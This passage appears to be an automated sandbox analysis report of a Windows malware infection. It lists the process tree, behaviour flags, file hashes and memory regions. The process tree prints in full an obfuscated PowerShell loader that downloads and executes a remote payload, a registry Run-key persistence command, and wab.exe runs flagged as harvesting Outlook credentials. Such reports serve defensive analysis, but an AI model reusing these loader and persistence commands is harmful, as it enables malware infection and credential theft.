cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
7⤵
PID:3256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
8⤵
PID:4620

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
PID:4516

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
PID:448

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
9⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
10⤵
- Adds Run key to start application
- Modifies registry key
PID:3836

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"
5⤵
- Checks computer location settings
PID:4680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
7⤵
PID:3436

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fplhkebrwaqhu"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3676

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hrrrlxmkkiiuflah"
5⤵
- Accesses Microsoft Outlook accounts
PID:4912

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\slekmpxmyrbzhrolkdu"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\09B406FB8A13DE24E07EA97DC21FE315
Filesize
504B

MD5
acde2ebd73bf401c166d86a7e31406b0

SHA1
2ded266e34831ec8ba306a323424dd9209c49c59

SHA256
2d775df3e298eca8eea960c3a3ceaa0f055977ef26eb16ec36dc443a8243c49b

SHA512
18e3fa8c897cdb13ac76e06431dcf8a45d83438b296635c47b3f55d8a5b626fb54e8fcce05067fba415846d2652c14a4c1c194ec3878093713ab8e693b3a6d9b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\09B406FB8A13DE24E07EA97DC21FE315
Filesize
546B

MD5
10d2bb10a0ff0e14a683bf68d522c909

SHA1
af2a16fca91b049a10a9bda63215d580a42d736b

SHA256
6fcc2b439fb1ce296f4eef617f8c75ed20f9425fa42efd6966f2bc256a6620f4

SHA512
6575b8992f371524b05b82ececa2328898015ca02cc22f73bc430ad2cd3cad4b188e96f1f3e18a341288b1292383a61f93b658dd61f14411cda98961cf8f99aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
52f1c95402ec7d7c147a598df0130ed1

SHA1
5500b4453c05a7eceb249ead6949a97e63b16ec9

SHA256
8a7b6ce336fdf4cd069181f2dc5543448b31a0af872301d84dc0dbda937d1b7d

SHA512
4074b63f1c657cb226e09f14b138f7f4038d7e27d2cca49f1c6be9d4c297b4a83d7255a0cec366a617c3844ccb685d90f1631391f2b190fc97c7d5505872c570

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
712a00a9d8164b3b6795c4e11800d2f1

SHA1
82952ef15a2e4e2b06cb149d3b206d11135128b5

SHA256
2a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052

SHA512
ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
a386c11bbaab5ce6e05c762df934507d

SHA1
4e85f6a3ca7aa131bc682dc2d9d5a7456f78dc1e

SHA256
9b89cc7017946fa4f8be7c169ab7109e257145c385a6415e28bfecd80054941f

SHA512
b40167f34134ea7b551573118719721c585e13f6ac891c627d609e9d6806f69739bcee6ae8e32d0ce37f88753891cf5fee82e196a37b451f3458289b01cb0994

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
806286a9ea8981d782ba5872780e6a4c

SHA1
99fe6f0c1098145a7b60fda68af7e10880f145da

SHA256
cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

SHA512
362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Poodle.vbs
Filesize
187KB

MD5
8cc6be5a2911ea3dc1a05c80e20ede55

SHA1
5a68267614fc4f21b949dc82def16adb1a2a7178

SHA256
7dfd8c4c8c675118ad9020c10d439d7037b6d9e8a37482f80ae821fed5b29824

SHA512
cc57268ceca2b9911b1672d18692dca2bfcb65052c8b945614f766e66ed849bf8f14aa9076f7478026144f89995c1552ac596153bde157349bcca880094a264a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xx4kp524.v3r.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vakujkwtnfybgdxojtdupplzytruqkwicf
Filesize
4KB

MD5
e9689445546dfde0d7496318bfbef6c8

SHA1
824304b951603171084b88d6879f474b77fddcdd

SHA256
3e57870283553f2a55d674391c0f2d04f3324b916553c5fe05ea391dab4be00e

SHA512
fc3ec8fe99f11bc0a5156a3ebc7746cfc8dfa7526030f30223e9e09b8e23de1e04f77aaa87bed9926c4810ec3de3385e57d6817f416a1dbd64e5ae27c8e3e65f

Download Submit
C:\Users\Admin\AppData\Roaming\Formatlinietegns191.Bje
Filesize
485KB

MD5
a06cda7715f697b502cf2db6c0bc524d

SHA1
16e24c924410364f27ca71379a7ddd5a779515ab

SHA256
a26c5b23d59eedc0449343dcf11a6498174ccf1a4b5d25e925143a01f87a0f45

SHA512
aaa84f6b760d409437593123196205a500eb5f05c3e9da3f155b843c2db01b25d5d0f31f80f72a493e5a58fcb4e8b31bb4efb89467a7ddf76769dac6416e50ba

Download Submit
C:\Users\Admin\AppData\Roaming\belemnoidea.Fos
Filesize
519KB

MD5
9cc29e9c2f524984e4ea412888fad3ab

SHA1
a3d9571861e7f334d70d82eb0c46e10f5427358e

SHA256
6b8159ea57129f319affa7fa8ca8a74bb1e59894e7c269675df3f65b3c5e3887

SHA512
d5761c80074c464327e346f2c89daed8de0691cc7d60140648f94c3d45232c035cebde895234118480abf6cdad4e187fcfb5fdd393aace83a52df62b4a493396

Download Submit
memory/412-62-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/412-61-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/412-64-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1492-63-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1492-69-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1492-65-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1616-70-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1616-71-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1616-68-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2044-33-0x0000000005EF0000-0x0000000006244000-memory.dmp

Filesize
3.3MB

Download
memory/2044-37-0x0000000006A20000-0x0000000006A3A000-memory.dmp

Filesize
104KB

Download
memory/2044-42-0x0000000008EC0000-0x000000000CD6B000-memory.dmp

Filesize
62.7MB

Download
memory/2044-19-0x0000000004F30000-0x0000000004F66000-memory.dmp

Filesize
216KB

Download
memory/2044-22-0x0000000005D60000-0x0000000005DC6000-memory.dmp

Filesize
408KB

Download
memory/2044-20-0x00000000055A0000-0x0000000005BC8000-memory.dmp

Filesize
6.2MB

Download
memory/2044-39-0x00000000076E0000-0x0000000007702000-memory.dmp

Filesize
136KB

Download
memory/2044-21-0x0000000005C40000-0x0000000005C62000-memory.dmp

Filesize
136KB

Download
memory/2044-38-0x0000000007750000-0x00000000077E6000-memory.dmp

Filesize
600KB

Download
memory/2044-40-0x0000000008910000-0x0000000008EB4000-memory.dmp

Filesize
5.6MB

Download
memory/2044-36-0x0000000007CE0000-0x000000000835A000-memory.dmp

Filesize
6.5MB

Download
memory/2044-35-0x00000000064E0000-0x000000000652C000-memory.dmp

Filesize
304KB

Download
memory/2044-23-0x0000000005E80000-0x0000000005EE6000-memory.dmp

Filesize
408KB

Download
memory/2044-34-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/2072-90-0x0000000022450000-0x0000000022469000-memory.dmp

Filesize
100KB

Download
memory/2072-93-0x0000000022450000-0x0000000022469000-memory.dmp

Filesize
100KB

Download
memory/2072-52-0x0000000002460000-0x000000000630B000-memory.dmp

Filesize
62.7MB

Download
memory/2072-94-0x0000000022450000-0x0000000022469000-memory.dmp

Filesize
100KB

Download
memory/2624-149-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2624-145-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3260-87-0x0000000005F30000-0x0000000006284000-memory.dmp

Filesize
3.3MB

Download
memory/3260-95-0x0000000006520000-0x000000000656C000-memory.dmp

Filesize
304KB

Download
memory/3676-142-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3676-141-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4052-110-0x0000000008DE0000-0x000000000E925000-memory.dmp

Filesize
91.3MB

Download
memory/4508-15-0x00007FFA4CE70000-0x00007FFA4D931000-memory.dmp

Filesize
10.8MB

Download
memory/4508-16-0x00007FFA4CE70000-0x00007FFA4D931000-memory.dmp

Filesize
10.8MB

Download
memory/4508-44-0x00007FFA4CE73000-0x00007FFA4CE75000-memory.dmp

Filesize
8KB

Download
memory/4508-45-0x00007FFA4CE70000-0x00007FFA4D931000-memory.dmp

Filesize
10.8MB

Download
memory/4508-4-0x00007FFA4CE73000-0x00007FFA4CE75000-memory.dmp

Filesize
8KB

Download
memory/4508-55-0x00007FFA4CE70000-0x00007FFA4D931000-memory.dmp

Filesize
10.8MB

Download
memory/4508-10-0x00000182438A0000-0x00000182438C2000-memory.dmp

Filesize
136KB

Download
memory/4572-160-0x0000000005CE0000-0x0000000006034000-memory.dmp

Filesize
3.3MB

Download
memory/4908-117-0x0000000000E70000-0x00000000069B5000-memory.dmp

Filesize
91.3MB

Download
memory/4908-127-0x0000000000E70000-0x00000000069B5000-memory.dmp

Filesize
91.3MB

Download
memory/4912-140-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4912-143-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download